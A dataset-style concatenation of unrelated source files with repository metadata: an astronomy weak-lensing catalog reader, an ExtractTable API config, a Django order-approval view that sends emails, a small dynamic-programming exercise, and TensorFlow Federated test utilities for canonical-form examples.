if sourceargs['type'] == "hsc-wide-s16a_v2.0" and sourceargs['filetype'] == "fits" and sourceargs["fullpofz"]:
itern = sourceargs['iter']
if itern == 0:
sourceargs['fits_list'] = glob.glob("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S16A_v2.0/*_tracts/*_%s.fits" % (sourceargs['pofz_type']))
if itern == len(sourceargs['fits_list']):
status = 1
datagal = 0
status = not (itern<len(sourceargs['fits_list']))
Ngal = 0
pofz = 0
if status:
return datagal, sourceargs, Ngal, status, pofz, 0., 0.
tractnum = (sourceargs['fits_list'][itern].split("/")[-1]).split("_pz")[0]
tractreg = (sourceargs['fits_list'][itern].split("/")[2]).split("_tracts")[0]
hdulist = pyfits.open(sourceargs['fits_list'][itern].split("_pz_pdf_%s" % (sourceargs['pofz_type']))[0] + ".fits")
data = hdulist[1].data
ira = data["ira"]
idec = data["idec"]
ishape_hsm_regauss_e1 = data["ishape_hsm_regauss_e1"]
ishape_hsm_regauss_e2 = data["ishape_hsm_regauss_e2"]
ishape_hsm_regauss_derived_bias_c1 = data["ishape_hsm_regauss_derived_bias_c1"]
ishape_hsm_regauss_derived_bias_c2 = data["ishape_hsm_regauss_derived_bias_c2"]
ishape_hsm_regauss_derived_bias_m = data["ishape_hsm_regauss_derived_bias_m"]
ishape_hsm_regauss_derived_weight = data["ishape_hsm_regauss_derived_weight"]
ishape_hsm_regauss_derived_rms_e = data["ishape_hsm_regauss_derived_rms_e"]
zeroarr = ishape_hsm_regauss_derived_bias_c1 * 0.0
datagalflag = data["weak_lensing_flag"]
datagal = np.array([ira, idec, ishape_hsm_regauss_e1, ishape_hsm_regauss_e2, ishape_hsm_regauss_derived_weight, ishape_hsm_regauss_derived_rms_e, ishape_hsm_regauss_derived_bias_m, ishape_hsm_regauss_derived_bias_c1, ishape_hsm_regauss_derived_bias_c2, zeroarr, zeroarr]).T
hdulist = pyfits.open(sourceargs['fits_list'][itern].split("_pdf_%s" % sourceargs['pofz_type'])[0] + ".fits")
data = hdulist[1].data
if sourceargs['pofz_type'] == "frankenz":
pofzflag = (datagalflag == True)
elif sourceargs['pofz_type'] == "mizuki":
pofzflag = (datagalflag == True)
elif sourceargs['pofz_type'] == "mlz":
pofzflag = (datagalflag == True)
elif sourceargs['pofz_type'] == "ephor":
pofzflag = (datagalflag == True)
sourceargs['fitspofz'] = fitsio.FITS(sourceargs['fits_list'][itern])
pofz = sourceargs['fitspofz'][1]['P(z)'][:]
pofz = pofz.reshape((pofz.shape[0], -1,))
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S16A_v2.0/%s_tracts/%s_pz.fits" % (tractreg, tractnum) )
data = hdulist[1].data
pofzflag = (data["%s_photoz_risk_best" % (sourceargs['pofz_type']) ]<0.5)
sourceargs['iter'] = sourceargs['iter'] + 1
Ngal = np.shape(datagal)[0]
status = 0
if sourceargs['type'] == "mockhsc-wide-s16a_v2.0" and sourceargs['filetype'] == "fits" and sourceargs["fullpofz"]:
rotation = sourceargs['rotation']
realization = sourceargs['realization']
itern = sourceargs['iter']
if itern == 0:
sourceargs['fits_list'] = glob.glob("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S16A_v2.0/*_tracts/*_%s.fits" % (sourceargs['pofz_type']))
#sourceargs['fits_list_2'] = glob.glob("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S16A_v2.0/*_tracts/*_pz.fits")
while itern<len(sourceargs['fits_list']):
tractnum = (sourceargs['fits_list'][itern].split("/")[-1]).split("_pz")[0]
tractreg = (sourceargs['fits_list'][itern].split("/")[2]).split("_tracts")[0]
print tractnum, tractreg
try:
mockname = "/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/Mocks_shape/%s/r%03d/rotmat%s/mock_%s.fits" % (tractreg, realization, rotation, tractnum)
print mockname
hdulistmock = pyfits.open(mockname)
datamock = hdulistmock[1].data
break
except:
itern = itern + 1
sourceargs['iter'] = itern
if itern == len(sourceargs['fits_list']):
status = 1
datagal = 0
status = not (itern<len(sourceargs['fits_list']))
Ngal = 0
pofz = 0
if status:
return datagal, sourceargs, Ngal, status, pofz, 0., 0.
print itern, sourceargs['fits_list'][itern]
shapefile = sourceargs['fits_list'][itern].split("_pz_pdf_%s" % (sourceargs['pofz_type']))[0] + ".fits"
print shapefile
hdulist = pyfits.open(shapefile)
data = hdulist[1].data
ira = data["ira"]
idec = data["idec"]
ishape_hsm_regauss_e1 = datamock["e1_mock"].astype("float64")
ishape_hsm_regauss_e2 = datamock["e2_mock"].astype("float64")
ishape_hsm_regauss_derived_bias_c1 = data["ishape_hsm_regauss_derived_bias_c1"] * 0.0
ishape_hsm_regauss_derived_bias_c2 = data["ishape_hsm_regauss_derived_bias_c2"] * 0.0
ishape_hsm_regauss_derived_bias_m = data["ishape_hsm_regauss_derived_bias_m"] * 0.0
ishape_hsm_regauss_derived_weight = data["ishape_hsm_regauss_derived_weight"]
ishape_hsm_regauss_derived_rms_e = data["ishape_hsm_regauss_derived_rms_e"]
zeroarr = ishape_hsm_regauss_derived_bias_c1 * 0.0
datagalflag = data["weak_lensing_flag"]
datagal = np.array([ira, idec, ishape_hsm_regauss_e1, ishape_hsm_regauss_e2, ishape_hsm_regauss_derived_weight, ishape_hsm_regauss_derived_rms_e, ishape_hsm_regauss_derived_bias_m, ishape_hsm_regauss_derived_bias_c1, ishape_hsm_regauss_derived_bias_c2, zeroarr, zeroarr]).T
hdulist = pyfits.open(sourceargs['fits_list'][itern].split("_pdf_%s" % sourceargs['pofz_type'])[0] + ".fits")
data = hdulist[1].data
if sourceargs['pofz_type'] == "frankenz":
pofzflag = (datagalflag == True)
elif sourceargs['pofz_type'] == "mizuki":
pofzflag = (datagalflag == True)
elif sourceargs['pofz_type'] == "mlz":
pofzflag = (datagalflag == True)
elif sourceargs['pofz_type'] == "ephor":
pofzflag = (datagalflag == True)
sourceargs['fitspofz'] = fitsio.FITS(sourceargs['fits_list'][itern])
pofz = sourceargs['fitspofz'][1]['P(z)'][:]
pofz = pofz.reshape((pofz.shape[0], -1,))
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S16A_v2.0/%s_tracts/%s_pz.fits" % (tractreg, tractnum))
data = hdulist[1].data
pofzflag = (data["%s_photoz_risk_best" % (sourceargs['pofz_type']) ]<0.5)
sourceargs['iter'] = sourceargs['iter'] + 1
Ngal = np.shape(datagal)[0]
status = 0
return datagal, sourceargs, Ngal, status, pofz, datagalflag, pofzflag
# S15B v2.1 kept here for notes
if sourceargs['type'] == "hsc-wide" and sourceargs['filetype'] == "fits" and sourceargs["fullpofz"]:
itern = sourceargs['iter']
if itern == 0:
sourceargs['fits_list'] = glob.glob("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S15B_v2.1/*_tracts/*_%s.fits" % (sourceargs['pofz_type']))
if itern == len(sourceargs['fits_list']):
status = 1
datagal = 0
status = not (itern<len(sourceargs['fits_list']))
Ngal = 0
pofz = 0
if status:
return datagal, sourceargs, Ngal, status, pofz, 0., 0.
hdulist = pyfits.open(sourceargs['fits_list'][itern].split("_pz_pdf_%s" % (sourceargs['pofz_type']))[0] + ".fits")
data = hdulist[1].data
imag_cmodel = data["imag_cmodel"]
iflux_cmodel = data["iflux_cmodel"]
iflux_cmodel_err = data["iflux_cmodel_err"]
ishape_hsm_regauss_resolution = data["ishape_hsm_regauss_resolution"]
ishape_hsm_regauss_e1 = data["ishape_hsm_regauss_e1"]
ishape_hsm_regauss_e2 = data["ishape_hsm_regauss_e2"]
ishape_hsm_regauss_sigma = data["ishape_hsm_regauss_sigma"]
ira = data["ira"]
idec = data["idec"]
datagalflag = (imag_cmodel < 25.0) & (iflux_cmodel/iflux_cmodel_err >=10) & (ishape_hsm_regauss_resolution> 1./3.) & (ishape_hsm_regauss_e1**2 + ishape_hsm_regauss_e2**2 < 4) & (ishape_hsm_regauss_sigma<0.4)
#datagalflag = (imag_cmodel < 24.5) & (iflux_cmodel/iflux_cmodel_err >=10) & (iflux_cmodel/iflux_cmodel_err <80) & (ishape_hsm_regauss_resolution> 0.3) & (ishape_hsm_regauss_e1**2 + ishape_hsm_regauss_e2**2 < 4) & (ishape_hsm_regauss_sigma<0.4)
#datagalflag = (imag_cmodel < 27.0)
datagal = np.array([ira, idec, ishape_hsm_regauss_e1, ishape_hsm_regauss_e2, ishape_hsm_regauss_sigma]).T
hdulist = pyfits.open(sourceargs['fits_list'][itern].split("_pdf_%s" % sourceargs['pofz_type'])[0] + ".fits")
data = hdulist[1].data
if sourceargs['pofz_type'] == "demp":
z_median = data["%s_photoz_median" % (sourceargs['pofz_type'])]
z_mode = data["%s_photoz_mode" % (sourceargs['pofz_type'])]
z_conf = data["%s_photoz_conf_median" % (sourceargs['pofz_type'])]
pofzflag = (np.absolute(z_mode - z_median)/(1+z_mode) < 0.8) & (z_conf > 0.09)
elif sourceargs['pofz_type'] == "mizuki":
red_chi2 = data["%s_reduced_chisq" % (sourceargs['pofz_type'])]
z_var = data["%s_photoz_variance" % (sourceargs['pofz_type'])]
pofzflag = (red_chi2<5) & (z_var<0.45)
elif sourceargs['pofz_type'] == "nnpz":
photoz_flag = data["%s_photoz_flag" % (sourceargs['pofz_type'])]
is_clean = data["%s_is_clean" % (sourceargs['pofz_type'])]
pofzflag = (is_clean==1) & (photoz_flag<=1)
elif sourceargs['pofz_type'] == "mlz":
stddev = data["%s_photoz_stddev_mean" % (sourceargs['pofz_type'])]
conf_mean = data["%s_photoz_conf_mean" % (sourceargs['pofz_type'])]
pofzflag = (stddev<3) & (conf_mean>0.13)
elif sourceargs['pofz_type'] == "frrfv0":
pofzflag = (datagalflag == True)
sourceargs['fitspofz'] = fitsio.FITS(sourceargs['fits_list'][itern])
pofz = sourceargs['fitspofz'][1]['P(z)'][:]
pofz = pofz.reshape((pofz.shape[0], -1,))
sourceargs['iter'] = sourceargs['iter'] + 1
Ngal = np.shape(datagal)[0]
status = 0
if sourceargs['type'] == "alexie-test" and sourceargs['filetype'] == "ascii" and not sourceargs["fullpofz"]:
itern = sourceargs['iter']
if itern == 0:
sourceargs['dfchunks'] = pandas.read_csv("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/alexie-test/GAMA15H_sources_test_original2.cat", names=(['ra','dec','z_b','jk','e1','e2','weight']), chunksize=chunksize, delim_whitespace=1)
try:
datagal = sourceargs['dfchunks'].next()
except:
status = 1
return 0.0, sourceargs, 0.0, status, 0, 0, 0
sourceargs['iter'] = sourceargs['iter'] + 1
Ngal = datagal.ra.size
status = 0
pofz = datagal.z_b.values
datagalflag = (datagal.ra.values==datagal.ra.values)
pofzflag = (datagal.ra.values==datagal.ra.values)
if sourceargs['type'] == "hsc-wide" and sourceargs['filetype'] == "fits" and not sourceargs["fullpofz"]:
itern = sourceargs['iter']
if itern == 0:
sourceargs['fits_list'] = glob.glob("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S15B_v2.1/*_tracts/*_pz.fits")
#sourceargs['fits_list'] = glob.glob("/home/surhud//home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S15B_v2.1/WIDE12H_tracts/*_pz.fits")
if itern == len(sourceargs['fits_list']):
status = 1
datagal = 0
status = not (itern<len(sourceargs['fits_list']))
Ngal = 0
pofz = 0
if status:
return datagal, sourceargs, Ngal, status, pofz, 0, 0
# First apply the flags
hdulist = pyfits.open(sourceargs['fits_list'][itern].split("_pz")[0] + ".fits" )
data = hdulist[1].data
imag_cmodel = data["imag_cmodel"]
iflux_cmodel = data["iflux_cmodel"]
iflux_cmodel_err = data["iflux_cmodel_err"]
ishape_hsm_regauss_resolution = data["ishape_hsm_regauss_resolution"]
ishape_hsm_regauss_e1 = data["ishape_hsm_regauss_e1"]
ishape_hsm_regauss_e2 = data["ishape_hsm_regauss_e2"]
ishape_hsm_regauss_sigma = data["ishape_hsm_regauss_sigma"]
ira = data["ira"]
idec = data["idec"]
datagalflag = (imag_cmodel < 25.0) & (iflux_cmodel/iflux_cmodel_err >=10) & (ishape_hsm_regauss_resolution> 0.3) & (ishape_hsm_regauss_e1**2 + ishape_hsm_regauss_e2**2 < 4) & (ishape_hsm_regauss_sigma<0.4)
datagal = np.array([ira, idec, ishape_hsm_regauss_e1, ishape_hsm_regauss_e2, ishape_hsm_regauss_sigma]).T
hdulist = pyfits.open(sourceargs['fits_list'][itern])
data = hdulist[1].data
z_median = data["%s_photoz_median" % (sourceargs['pofz_type'])]
if sourceargs['pofz_type'] == "demp":
z_mode = data["%s_photoz_mode" % (sourceargs['pofz_type'])]
z_conf = data["%s_photoz_conf_median" % (sourceargs['pofz_type'])]
pofzflag = (np.absolute(z_mode - z_median)/(1+z_mode) < 0.8) & (z_conf > 0.09)
elif sourceargs['pofz_type'] == "mizuki":
red_chi2 = data["%s_reduced_chisq" % (sourceargs['pofz_type'])]
z_var = data["%s_photoz_variance" % (sourceargs['pofz_type'])]
pofzflag = (red_chi2<5) & (z_var<0.45)
elif sourceargs['pofz_type'] == "nnpz":
photoz_flag = data["%s_photoz_flag" % (sourceargs['pofz_type'])]
is_clean = data["%s_is_clean" % (sourceargs['pofz_type'])]
pofzflag = (is_clean==1) & (photoz_flag<=1)
elif sourceargs['pofz_type'] == "mlz":
stddev = data["%s_photoz_stddev_mean" % (sourceargs['pofz_type'])]
conf_mean = data["%s_photoz_conf_mean" % (sourceargs['pofz_type'])]
pofzflag = (stddev<3) & (conf_mean>0.13)
pofz = data["%s_photoz_median" % (sourceargs['pofz_type']) ]
sourceargs['iter'] = sourceargs['iter'] + 1
Ngal = pofz.size
status = 0
if sourceargs['type'] == "hsc-wide-josh" and sourceargs['filetype'] == "fits":
# Glob up all the tracts
if sourceargs["fullpofz"]:
print "P(z) not implemented for Josh's catalog"
exit(11)
else:
pass
itern = sourceargs['iter']
if itern == 0:
sourceargs['fits'] = fitsio.FITS("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/RF/hsc_s15b_wl_catalog_v0.fits")
#sourceargs['fits'] = fitsio.FITS("/home/surhud//home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/rf_wide12h_hsc_s15b_wl_catalog_v0.fits")
sourceargs['nrows'] = sourceargs['fits'][1].read_header()['naxis2']
datagal = 0
status = (itern*chunksize>=sourceargs['nrows'])
Ngal = 0
pofz = 0
if status:
return datagal, sourceargs, Ngal, status, pofz, 0, 0
wheremask = sourceargs['fits'][1].where("#row>%d && #row<=%d" % (itern*chunksize, (itern+1)*chunksize))
datagal = sourceargs['fits'][1]['ra','dec','e1','e2','weight'][wheremask]
if sourceargs["fullpofz"]:
print "Full p(z) not supported yet"
else:
pofz = sourceargs['fits'][1]['z_med'][wheremask]
sourceargs['iter'] = sourceargs['iter'] + 1
Ngal = np.shape(datagal)[0]
forflag = np.arange(Ngal)
datagalflag = (forflag==forflag)
pofzflag = (forflag==forflag)
'''
def get_pofz_array(sourceargs):
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/S16A_v2.0/pz_pdf_bins_%s.fits" % sourceargs['pofz_type'])
data = hdulist[1].data
return data["bins"]
|
[
"ratewalamit@gmail.com"
] |
ratewalamit@gmail.com
|
61ac1e63f84e1ca18e20b096e9600d99111c4c5c
|
bac204b9c5306de3ca9edd77b813154299f5708b
|
/ExtractTable/config.py
|
957fdc69f75e4fe40b564ff2f96edbd32f0b5935
|
[
"Apache-2.0"
] |
permissive
|
ExtractTable/ExtractTable-py
|
a365ce70d50aa4ae3a46170541f288af81443cb2
|
e7ad566f2b49089ca4acb16149a985278b46a9a9
|
refs/heads/master
| 2023-05-27T03:13:38.048258
| 2022-07-18T22:30:39
| 2022-07-18T22:30:39
| 213,262,054
| 232
| 29
|
Apache-2.0
| 2023-05-22T01:52:44
| 2019-10-06T23:54:29
|
Python
|
UTF-8
|
Python
| false
| false
| 557
|
py
|
"""
Configure all Server request/response objects here
"""
class HOST:
"""API Endpoints of ExtractTable.com"""
VALIDATOR = 'validator.extracttable.com'
TRIGGER = 'trigger.extracttable.com'
RESULT = 'getresult.extracttable.com'
BIGFILE = 'bigfile.extracttable.com'
TRANSACTIONS = 'viewtransactions.extracttable.com'
class JobStatus:
"""Job Status responses recieved from Server. Declared here to maintain consistency"""
SUCCESS = 'Success'
FAILED = 'Failed'
PROCESSING = 'Processing'
INCOMPLETE = 'Incomplete'
|
[
"noreply@github.com"
] |
ExtractTable.noreply@github.com
|
7b1d36e6759d21e129f1ccb505e5824290d24a31
|
02d8a8b44dc9f8f3c63c2f62f24ceaee7d94fd12
|
/apps/profile/views.py
|
ef24c418f7057f9700edd7b07e9c9801961c3ee3
|
[] |
no_license
|
bladas/transfer
|
0970a4290e2e92e56853a64211ab3e79c479c0aa
|
54c61b7bf340af4f48c7c7162805697b0417f4d7
|
refs/heads/master
| 2023-01-04T12:45:36.784275
| 2019-12-08T17:34:36
| 2019-12-08T17:34:36
| 224,606,015
| 0
| 0
| null | 2022-11-22T04:52:01
| 2019-11-28T08:31:59
|
Python
|
UTF-8
|
Python
| false
| false
| 2,751
|
py
|
from django.shortcuts import render, redirect
from django.views.generic import ListView, FormView
from apps.orders.models import *
from django.core import mail
from django.template.loader import render_to_string
conection = mail.get_connection()
conection.open()
class ProfileView(ListView):
template_name = 'profile.html'
model = Order
# paginate_by = 5
def get_queryset(self):
pass
def get_context_data(self, **kwargs):
# Call the base implementation first to get a context
context = super().get_context_data(**kwargs)
# Add in a QuerySet of all the books
context['OrderFalse'] = Order.objects.filter(end=False).order_by('-id')
context['OrderTrue'] = Order.objects.filter(end=True).order_by('-id')
return context
def post(self, request, *args, **kwargs):
print(self.request.POST)
if self.request.method == "POST":
order_id = self.request.POST.get('order_id')
objects = Order.objects.get(pk=order_id)
print(objects.email)
email = objects.email
message = render_to_string('message/positive_message.html', {})
message2 = render_to_string('message/negative_message.html', {})
if self.request.POST.get('materialExampleRadios') == '1':
# Order.objects.update(end=True)
Order.objects.filter(pk=order_id).update(flag = 'Одобрено', end=True)
with mail.get_connection() as connection:
msg = mail.EmailMessage(
'Заказ трансфера по испанни', message,
'daskevichvladislav25@gmail.com', [email],
connection=connection,
)
msg.content_subtype = "html"
msg.send()
print("Отправлено одобрение")
return redirect('/')
elif self.request.POST.get('materialExampleRadios') == '2':
# Order.objects.update()
# Order.objects.update(flag = 'Отклонено')
Order.objects.filter(pk=order_id).update(flag = 'Отклонено',end=True)
with mail.get_connection() as connection:
msg = mail.EmailMessage(
'Заказ трансфера по испанни', message2,
'daskevichvladislav25@gmail.com', [email],
connection=connection,
)
msg.content_subtype = "html"
msg.send()
print("Отправлено отказ")
return redirect('/')
|
[
"dashkevich_v@ukr.net"
] |
dashkevich_v@ukr.net
|
766840ecca2b4badf80dd3693e85dd3563f8ecaa
|
9738a5c6f1a0ff018da89d6385c22ef0d566fd89
|
/dynamic8-5.py
|
6e932681be31d6e5f93390d26340b9f1ba8e7925
|
[] |
no_license
|
clearwater92/Algorithm
|
348550a706edd05bb8d31d65d48029126b50e623
|
d4d4b66a549ed79528f05aaf89cf7aa01d95dad2
|
refs/heads/main
| 2023-01-20T12:42:26.161955
| 2020-12-03T12:53:23
| 2020-12-03T12:53:23
| 305,384,185
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 475
|
py
|
###
#이것이 코딩테스트다 교재의 p217 문제입니다.
###
import sys
x = int(sys.stdin.readline().rstrip())
d = [0] * 30001
for i in range(2, x + 1):
d[i] = d[i - 1] + 1 # 점화식에 맞게 구현
if i % 2 == 0:
d[i] = min(d[i], d[i // 2] + 1) # 1을 뺀 것보다 2로 나눈 횟수가 더 적을지 비교
if i % 3 == 0:
d[i] = min(d[i], d[i // 3] + 1)
if i % 5 == 0:
d[i] = min(d[i], d[i // 5] + 1)
print(d[x])
|
[
"clearwater92@naver.com"
] |
clearwater92@naver.com
|
104fc669d2af9fa208c4aed1d720c01d359a05f9
|
e98f2775d0b7b9aca26e4ef6a3c08ca0100a1442
|
/tensorflow_federated/python/core/backends/mapreduce/test_utils.py
|
f1aeca67ea8ccadf1f89de7152c7f2c39569ec29
|
[
"Apache-2.0"
] |
permissive
|
sgpohlj87/federated
|
54131d8e62a3df1b0bb396d11ba6e6a2e1ada11d
|
ca179ac0e2c0cf9c33169d13fbb44668cbab6982
|
refs/heads/master
| 2020-07-18T22:34:06.001195
| 2019-09-03T22:12:33
| 2019-09-03T22:13:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,890
|
py
|
# Lint as: python2, python3
# Copyright 2019, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utils that support unit tests in this component."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import numpy as np
import tensorflow as tf
import tensorflow_federated as tff
from tensorflow_federated.python.core.api import computation_types
from tensorflow_federated.python.core.api import computations
from tensorflow_federated.python.core.backends.mapreduce import canonical_form
from tensorflow_federated.python.core.impl.compiler import building_blocks
def get_temperature_sensor_example():
"""Constructs `canonical_form.CanonicalForm` for temperature sensors example.
The temperature sensor example computes the fraction of sensors that report
temperatures over the threshold.
Returns:
An instance of `canonical_form.CanonicalForm`.
"""
@computations.tf_computation
def initialize():
return {'num_rounds': tf.constant(0)}
# The state of the server is a singleton tuple containing just the integer
# counter `num_rounds`.
server_state_type = computation_types.NamedTupleType([('num_rounds', tf.int32)
])
@computations.tf_computation(server_state_type)
def prepare(state):
return {'max_temperature': 32.0 + tf.cast(state.num_rounds, tf.float32)}
# The initial state of the client is a singleton tuple containing a single
# float `max_temperature`, which is the threshold received from the server.
client_state_type = computation_types.NamedTupleType([('max_temperature',
tf.float32)])
# The client data is a sequence of floats.
client_data_type = computation_types.SequenceType(tf.float32)
@computations.tf_computation(client_data_type, client_state_type)
def work(data, state):
"""See the `canonical_form.CanonicalForm` definition of `work`."""
def fn(s, x):
return {
'num': s['num'] + 1,
'max': tf.maximum(s['max'], x),
}
reduce_result = data.reduce({
'num': np.int32(0),
'max': np.float32(-459.67)
}, fn)
return ({
'is_over': reduce_result['max'] > state.max_temperature
}, {
'num_readings': reduce_result['num']
})
# The client update is a singleton tuple with a Boolean-typed `is_over`.
client_update_type = computation_types.NamedTupleType([('is_over', tf.bool)])
# The accumulator for client updates is a pair of counters, one for the
# number of clients over threshold, and the other for the total number of
# client updates processed so far.
accumulator_type = computation_types.NamedTupleType([('num_total', tf.int32),
('num_over', tf.int32)])
@computations.tf_computation
def zero():
return collections.OrderedDict([('num_total', tf.constant(0)),
('num_over', tf.constant(0))])
@computations.tf_computation(accumulator_type, client_update_type)
def accumulate(accumulator, update):
return collections.OrderedDict([
('num_total', accumulator.num_total + 1),
('num_over', accumulator.num_over + tf.cast(update.is_over, tf.int32))
])
@computations.tf_computation(accumulator_type, accumulator_type)
def merge(accumulator1, accumulator2):
return collections.OrderedDict([
('num_total', accumulator1.num_total + accumulator2.num_total),
('num_over', accumulator1.num_over + accumulator2.num_over)
])
@computations.tf_computation(merge.type_signature.result)
def report(accumulator):
return {
'ratio_over_threshold': (tf.cast(accumulator['num_over'], tf.float32) /
tf.cast(accumulator['num_total'], tf.float32))
}
# The type of the combined update is a singleton tuple containing a float
# named `ratio_over_threshold`.
combined_update_type = computation_types.NamedTupleType([
('ratio_over_threshold', tf.float32)
])
@computations.tf_computation(server_state_type, combined_update_type)
def update(state, update):
return ({'num_rounds': state.num_rounds + 1}, update)
return canonical_form.CanonicalForm(initialize, prepare, work, zero,
accumulate, merge, report, update)
def get_mnist_training_example():
"""Constructs `canonical_form.CanonicalForm` for mnist training.
Returns:
An instance of `canonical_form.CanonicalForm`.
"""
model_nt = collections.namedtuple('Model', 'weights bias')
server_state_nt = (collections.namedtuple('ServerState', 'model num_rounds'))
# Start with a model filled with zeros, and the round counter set to zero.
@computations.tf_computation
def initialize():
return server_state_nt(
model=model_nt(weights=tf.zeros([784, 10]), bias=tf.zeros([10])),
num_rounds=tf.constant(0))
server_state_tff_type = server_state_nt(
model=model_nt(weights=(tf.float32, [784, 10]), bias=(tf.float32, [10])),
num_rounds=tf.int32)
client_state_nt = (
collections.namedtuple('ClientState', 'model learning_rate'))
# Pass the model to the client, along with a dynamically adjusted learning
# rate that starts at 0.1 and decays exponentially by a factor of 0.9.
@computations.tf_computation(server_state_tff_type)
def prepare(state):
learning_rate = 0.1 * tf.pow(0.9, tf.cast(state.num_rounds, tf.float32))
return client_state_nt(model=state.model, learning_rate=learning_rate)
batch_nt = collections.namedtuple('Batch', 'x y')
batch_tff_type = batch_nt(x=(tf.float32, [None, 784]), y=(tf.int32, [None]))
dataset_tff_type = computation_types.SequenceType(batch_tff_type)
model_tff_type = model_nt(
weights=(tf.float32, [784, 10]), bias=(tf.float32, [10]))
client_state_tff_type = client_state_nt(
model=model_tff_type, learning_rate=tf.float32)
loop_state_nt = collections.namedtuple('LoopState', 'num_examples total_loss')
update_nt = collections.namedtuple('Update', 'model num_examples loss')
stats_nt = collections.namedtuple('Stats', 'num_examples loss')
# Train the model locally, emit the loclaly-trained model and the number of
# examples as an update, and the average loss and the number of examples as
# local client stats.
@computations.tf_computation(dataset_tff_type, client_state_tff_type)
def work(data, state): # pylint: disable=missing-docstring
model_vars = model_nt(
weights=tf.Variable(initial_value=state.model.weights, name='weights'),
bias=tf.Variable(initial_value=state.model.bias, name='bias'))
with tf.control_dependencies([tf.global_variables_initializer()]):
init_model = tf.group(
tf.assign(model_vars.weights, state.model.weights),
tf.assign(model_vars.bias, state.model.bias))
optimizer = tf.train.GradientDescentOptimizer(state.learning_rate)
@tf.function
def reduce_fn(loop_state, batch):
pred_y = tf.nn.softmax(
tf.matmul(batch.x, model_vars.weights) + model_vars.bias)
loss = -tf.reduce_mean(
tf.reduce_sum(
tf.one_hot(batch.y, 10) * tf.log(pred_y), reduction_indices=[1]))
with tf.control_dependencies([optimizer.minimize(loss)]):
return loop_state_nt(
num_examples=loop_state.num_examples + 1,
total_loss=loop_state.total_loss + loss)
with tf.control_dependencies([init_model]):
loop_state = data.reduce(
loop_state_nt(num_examples=0, total_loss=np.float32(0.0)), reduce_fn)
num_examples = loop_state.num_examples
total_loss = loop_state.total_loss
with tf.control_dependencies([num_examples, total_loss]):
loss = total_loss / tf.cast(num_examples, tf.float32)
return (update_nt(model=model_vars, num_examples=num_examples, loss=loss),
stats_nt(num_examples=num_examples, loss=loss))
accumulator_nt = update_nt
# Initialize accumulators for aggregation with zero model and zero examples.
@computations.tf_computation
def zero():
return accumulator_nt(
model=model_nt(weights=tf.zeros([784, 10]), bias=tf.zeros([10])),
num_examples=tf.constant(0),
loss=tf.constant(0.0, dtype=tf.float32))
update_tff_type = update_nt(
model=model_tff_type, num_examples=tf.int32, loss=tf.float32)
accumulator_tff_type = update_tff_type
# We add an update to an accumulator with the update's model multipled by the
# number of examples, so we can compute a weighted average in the end.
@computations.tf_computation(accumulator_tff_type, update_tff_type)
def accumulate(accumulator, update):
scaling_factor = tf.cast(update.num_examples, tf.float32)
scaled_model = tf.nest.map_structure(lambda x: x * scaling_factor,
update.model)
return accumulator_nt(
model=tf.nest.map_structure(tf.add, accumulator.model, scaled_model),
num_examples=accumulator.num_examples + update.num_examples,
loss=accumulator.loss + update.loss * scaling_factor)
# Merging accumulators does not involve scaling.
@computations.tf_computation(accumulator_tff_type, accumulator_tff_type)
def merge(accumulator1, accumulator2):
return accumulator_nt(
model=tf.nest.map_structure(tf.add, accumulator1.model,
accumulator2.model),
num_examples=accumulator1.num_examples + accumulator2.num_examples,
loss=accumulator1.loss + accumulator2.loss)
report_nt = accumulator_nt
# The result of aggregation is produced by dividing the accumulated model by
# the total number of examples. Same for loss.
@computations.tf_computation(accumulator_tff_type)
def report(accumulator):
scaling_factor = 1.0 / tf.cast(accumulator.num_examples, tf.float32)
scaled_model = model_nt(
weights=accumulator.model.weights * scaling_factor,
bias=accumulator.model.bias * scaling_factor)
return report_nt(
model=scaled_model,
num_examples=accumulator.num_examples,
loss=accumulator.loss * scaling_factor)
report_tff_type = accumulator_tff_type
metrics_nt = collections.namedtuple('Metrics', 'num_rounds num_examples loss')
# Pass the newly averaged model along with an incremented round counter over
# to the next round, and output the counters and loss as server metrics.
@computations.tf_computation(server_state_tff_type, report_tff_type)
def update(state, report):
num_rounds = state.num_rounds + 1
return (server_state_nt(model=report.model, num_rounds=num_rounds),
metrics_nt(
num_rounds=num_rounds,
num_examples=report.num_examples,
loss=report.loss))
return canonical_form.CanonicalForm(initialize, prepare, work, zero,
accumulate, merge, report, update)
def construct_example_training_comp():
"""Constructs a `tff.utils.IterativeProcess` via the FL API."""
np.random.seed(0)
sample_batch = collections.OrderedDict([('x',
np.array([[1., 1.]],
dtype=np.float32)),
('y', np.array([[0]],
dtype=np.int32))])
def model_fn():
"""Constructs keras model."""
keras_model = tf.keras.models.Sequential([
tf.keras.layers.Dense(
1,
activation=tf.nn.softmax,
kernel_initializer='zeros',
input_shape=(2,))
])
def loss_fn(y_true, y_pred):
return tf.reduce_mean(
tf.keras.losses.sparse_categorical_crossentropy(y_true, y_pred))
keras_model.compile(
loss=loss_fn,
optimizer=tf.keras.optimizers.SGD(learning_rate=0.01),
metrics=[tf.keras.metrics.SparseCategoricalAccuracy()])
